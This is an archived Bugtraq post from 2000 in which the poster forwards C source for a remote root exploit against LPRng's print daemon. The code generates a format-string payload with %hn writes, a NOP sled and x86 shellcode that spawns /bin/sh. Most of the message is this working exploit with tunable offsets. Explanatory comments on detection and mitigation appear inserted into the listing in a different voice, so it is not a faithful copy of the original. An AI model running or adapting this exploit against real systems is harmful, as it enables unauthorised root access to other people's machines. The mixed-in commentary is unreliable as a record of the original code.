[17998] in bugtraq
Re: lpd buffer overflow
daemon@ATHENA.MIT.EDU (gabriel maggiotti)
Sun Dec 10 19:22:59 2000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="------------=_4D4801152B14085221C8"
Content-Transfer-Encoding: 7bit
Message-Id: <20001207.21164700@pluto.net>
Date: Thu, 7 Dec 2000 21:16:47 GMT
Reply-To: gabriel maggiotti <gmaggiot@CIUDAD.COM.AR>
From: gabriel maggiotti <gmaggiot@CIUDAD.COM.AR>
To: BUGTRAQ@SECURITYFOCUS.COM
--------------=_4D4801152B14085221C8
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Hello guys,
I've been searching the net for the 'lpd exploit' since I read about it in
the first mail. I found this code yesterday, but haven't tried it yet.
Please mail me if somebody tries it. Thanks guys.
--------------=_4D4801152B14085221C8
Content-Description: filename="lpd-ex.c"
Content-Disposition: inline; filename="lpd-ex.c"
Content-Type: text/plain; name ="lpd-ex.c"
Content-Transfer-Encoding: quoted-printable
/* LPRng remote root exploit for x86 Linux
* 9/27/00
*
* - JimJones
* tested on compiled LPRng 3.6.22/23/24
*
*/
#include <unistd.h>
#include <stdio.h>
char sc[]=3D
"\x29\xdb\x29\xc0\x29\xd2\x31\xc9\xfe\xca\xb0\x46\xcd\x80\x29\xff"
"\x47\x47\x47\x43\x43\x43\x31\xc9\x29\xc0\xb0\x3f\xcd\x80\x41\x39"
"\xf9\x75\xf5\x39\xd3\x7e\xee\xeb\x19\x5e\x89\xf3\x89\xf7\x83\xc7"
"\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x0b"
"\xcd\x80\xe8\xe2\xff\xff\xff/bin/sh"
;
#define NOP 0x90 //will be split up, doesn't matter
/*
 * Builds a single string and prints it on stdout, followed by a newline.
 * Nothing in this file opens a socket, so delivery to a print service
 * happens outside the listing.
 *
 * Options (getopt string "a:b:e:s:p:d"):
 *   -a align, -b bpad, -e eiploc, -s shloc, -p pos, -d debug
 *
 * Layout of the printed string, in order:
 *   1. bpad bytes of 'B'
 *   2. three words: eiploc+2, 0x50505050, eiploc
 *   3. a printf-style directive of the form
 *      %<hi>d%<pos>$h<mode>%<lo>d%<pos+2>$h<mode>
 *   4. 385 bytes of 0x90
 *   5. the sc payload
 *
 * With the default mode 'n' the directives are positional %hn conversions,
 * i.e. two 16-bit writes. The string is therefore only harmful when the
 * receiver passes attacker-supplied text as the format argument of a
 * printf-family call. The page does not name the vulnerable call in LPRng.
 *
 * Detection: look for print requests or log lines that contain '%' directives
 * with '$hn' and multi-digit field widths, a long run of 0x90 bytes, or the
 * "/bin/sh" literal.
 *
 * Mitigation: run an LPRng release newer than the 3.6.22/23/24 builds the
 * header reports as tested, log untrusted text through a constant "%s"
 * format, and limit the lpd port (TCP 515) to trusted hosts.
 *
 * "=3D", "=20" and "=09" in this listing are quoted-printable encodings of
 * "=", space and tab, left as archived.
 */
int main(int argc, char** argv) {
/* getbuf is declared but never referenced in this function. */
char getbuf[1000];
int bpad=3D0; /* was 2 */ /* 3 for other */
/* 2 - -34
3 - -41
0 - -42
*/
int i=3D0;
int eiploc=3D0x41424344;
char buffer[1024];
char fmtbuf[128];
int shloc=3D-1; //0xbffff2c8;
int hi=3D100;=20
int lo=3D200;
int pre=3D0;
int align=3D-36;
int pos=3D511; //483; //488; /*299;*/
int debug=3D0;
char s=3D0;
/* Conversion character placed after "$h" in both directives; 'n' by default. */
char mode=3D'n';
/* Each option overwrites one of the tuning variables declared above. */
while ( ( s=3Dgetopt(argc, argv, "a:b:e:s:p:d")) !=3D EOF) {
switch(s) {
case 'a': align=3Datoi(optarg); break;
case 'b': bpad=3Datoi(optarg);
break;
case 'e': eiploc=3Dstrtoul(optarg, 0,0);
break;
case 's': shloc=3Dstrtoul(optarg, 0, 0);
break;
case 'p': pos=3Datoi(optarg); break;
case 'd': debug=3D1; break;
default:
}
}=09
/* When -s is not given, shloc is derived from eiploc with a fixed offset. */
if (shloc =3D=3D -1) shloc=3Deiploc+2450;
memset(buffer, 0, sizeof(buffer));
memset(fmtbuf, 0, sizeof(fmtbuf));
memset(buffer, 'B', bpad);
/* Three words are stored at the current end of the string (found via strlen). */
*(long*)(buffer+strlen(buffer))=3Deiploc+2;
*(long*)(buffer+strlen(buffer))=3D0x50505050;
*(long*)(buffer+strlen(buffer))=3Deiploc;
/* pre = number of bytes emitted before the directive; subtracted from hi below. */
pre=3Dstrlen(buffer);
/* Debug mode swaps the conversion character to 'p' and uses fixed widths of 100. */
if (debug) { mode=3D'p'; hi=3D100; lo=3D100; }
else {
/* hi and lo are field widths derived from the upper and lower 16 bits of shloc. */
hi=3D((shloc >> 16)&0xffff)-pre+align; /* was no 7 */
lo=3D((shloc >> 0)&0xffff)+0x10000-((shloc >> 16)&0xffff);
}
/* The directive text is formatted into fmtbuf and then appended to buffer. */
sprintf(fmtbuf, "%%%dd%%%d$h%c%%%dd%%%d$h%c", hi, pos, mode, lo, pos+2,=
mode);
strcat(buffer+strlen(buffer), fmtbuf);
/* make it easier to hit shellcode */
memset(buffer+strlen(buffer), NOP, 385);
strcat(buffer, sc);
*(char*)(buffer+strlen(buffer))=3D0;
/* Diagnostics go to stderr, so stdout carries only the generated string. */
fprintf(stderr, "strlen(fmtbuf): %i\n", strlen(fmtbuf));
fprintf(stderr, "pos: %i\n", pos);
fprintf(stderr, "align: %i\n", align);
fprintf(stderr, "eip location: 0x%x\n", eiploc);
fprintf(stderr, "shellcode location: 0x%x\n", shloc);
fprintf(stderr, "strlen(sc): %i\n", strlen(sc));
fprintf(stderr, "strlen(buffer): %i\n", strlen(buffer));
printf("%s", buffer);
putchar('\n');
}
--------------=_4D4801152B14085221C8--